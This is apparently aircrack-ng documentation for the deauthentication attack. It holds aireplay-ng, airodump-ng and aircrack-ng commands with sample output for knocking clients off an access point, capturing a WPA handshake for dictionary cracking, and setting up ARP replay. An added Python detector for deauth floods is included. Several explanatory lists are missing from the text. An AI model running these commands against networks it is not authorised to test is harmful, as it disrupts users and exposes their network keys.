This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:
Of course, this attack is totally useless if there are no associated wireless clients or on fake authentications.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
First, you determine a client which is currently connected. You need the MAC address for the following command:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
Here is what the output looks like:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
(switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap
Here is the explanation of the above commands:
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
Where:
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:
Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0
(switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
If the driver is wlan-ng, you should run the airmon-ng script (unless you know what to type), otherwise the card won't be correctly set up for injection.
It is usually more effective to target a specific station using the -c parameter.
The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them.
There can be several reasons and one or more can affect you:
See the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.
This section ONLY applies to the latest SVN version and to some release candidate versions of the aircrack-ng suite. Once they are released as “stable”, the documentation above will be updated.
For directed deauthentications, aireplay-ng sends out a total of 128 packets for each deauth you specify. 64 packets are sent to the AP itself and 64 packets are sent to the client.
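From the monitoring side, a burst of this shape (64 deauth frames spoofed from the AP plus 64 spoofed from the client, all naming the same BSSID within a fraction of a second) is easy to pick out of a capture. The following is an added Python example, not code from aircrack-ng: it parses the 802.11 management header of deauth/disassoc frames and raises an alert per BSSID when a sliding window holds more than a threshold of them. Frames are assumed to arrive as (timestamp, raw 802.11 frame) tuples, and the sample capture is constructed in the block using the MAC addresses from the page.

```python
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH, DISASSOC = 0xC, 0xA  # management-frame (type 0) subtypes
AP, CLIENT = "00:14:6c:7e:40:80", "00:0f:b5:ae:ce:9d"  # MACs from the page's example

def build_mgmt(subtype: int, dst: str, src: str, bssid: str, reason: int) -> bytes:
    """Constructed frame: 24-byte 802.11 MAC header followed by a 2-byte reason code."""
    fc = subtype << 4  # protocol version 0, type 0 (management), subtype in the high nibble
    addrs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (dst, src, bssid))
    return struct.pack("<BBH", fc, 0, 0) + addrs + struct.pack("<HH", 0, reason)

def parse_mgmt(frame: bytes):
    """Return (subtype, dst, src, bssid, reason) for deauth/disassoc frames, else None."""
    if len(frame) < 26:
        return None
    fc = frame[0]
    if ((fc >> 2) & 0x3) != 0 or (fc >> 4) not in (DEAUTH, DISASSOC):
        return None
    dst, src, bssid = (":".join(f"{b:02x}" for b in frame[i:i + 6]) for i in (4, 10, 16))
    return fc >> 4, dst, src, bssid, struct.unpack_from("<H", frame, 24)[0]

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Flag a BSSID (addr3) named by more than `threshold` deauth/disassoc frames within `window`
    seconds; grouping by BSSID catches frames spoofed from the AP and from the client alike."""
    per_bssid = defaultdict(list)
    for ts, raw in frames:  # frames: iterable of (timestamp, raw 802.11 frame)
        if parsed := parse_mgmt(raw):
            per_bssid[parsed[3]].append((ts, parsed[1] == BROADCAST))
    alerts = {}
    for bssid, events in per_bssid.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            alerts[bssid] = {"count": best, "broadcast": any(b for _, b in events)}
    return alerts

def sample_capture():
    """Constructed capture: 64 deauths to the client and 64 to the AP within 0.25 s, then one stray deauth elsewhere."""
    burst = []
    for i in range(64):
        burst.append((0.004 * i, build_mgmt(DEAUTH, CLIENT, AP, AP, 7)))
        burst.append((0.004 * i + 0.002, build_mgmt(DEAUTH, AP, CLIENT, AP, 7)))
    burst.append((100.0, build_mgmt(DEAUTH, "00:09:5b:eb:c5:2b", "00:13:10:30:24:9c", "00:13:10:30:24:9c", 3)))
    return burst
```

The `broadcast` flag distinguishes a directed attack like the one above from a broadcast deauth (destination ff:ff:ff:ff:ff:ff), which hits every client of the AP at once.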
Here is a typical command:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0
Here is typical output:
12:35:25 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]
Here is what the “[ 61|63 ACKs]” means: